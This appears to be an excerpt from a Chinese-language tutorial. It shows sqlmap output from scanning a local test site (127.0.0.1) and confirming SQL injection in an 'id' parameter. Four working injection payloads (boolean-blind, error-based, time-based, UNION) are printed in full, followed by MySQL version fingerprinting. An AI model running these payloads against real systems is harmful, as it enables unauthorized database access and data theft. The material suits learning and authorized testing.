[12:31:51] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:31:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:31:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:31:51] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:31:51] [INFO] target URL appears to have 3 columns in query
[12:31:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 1945=1945 AND ('oLHz'='oLHz
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1') AND (SELECT 6730 FROM(SELECT COUNT(*),CONCAT(0x716a6a7171,(SELECT (ELT(6730=6730,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('IlMq'='IlMq
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 1477 FROM (SELECT(SLEEP(5)))GkLS) AND ('Wwjt'='Wwjt
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4873') UNION ALL SELECT NULL,CONCAT(0x716a6a7171,0x45744c655268474b765270526d476a6a574a6d53776b4c637753784d664c6544774d766e664a5950,0x716a786a71),NULL-- -
---
[12:31:54] [INFO] testing MySQL
[12:31:54] [INFO] confirming MySQL
[12:31:54] [INFO] the back-end DBMS is MySQL
[12:31:54] [INFO] actively fingerprinting MySQL
[12:31:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:31:55] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
html error message fingerprint: MySQL
[12:31:55] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 12:31:55 /2020-03-01/
显示了active fingerprint,即显示了数据库的一些基本信息。
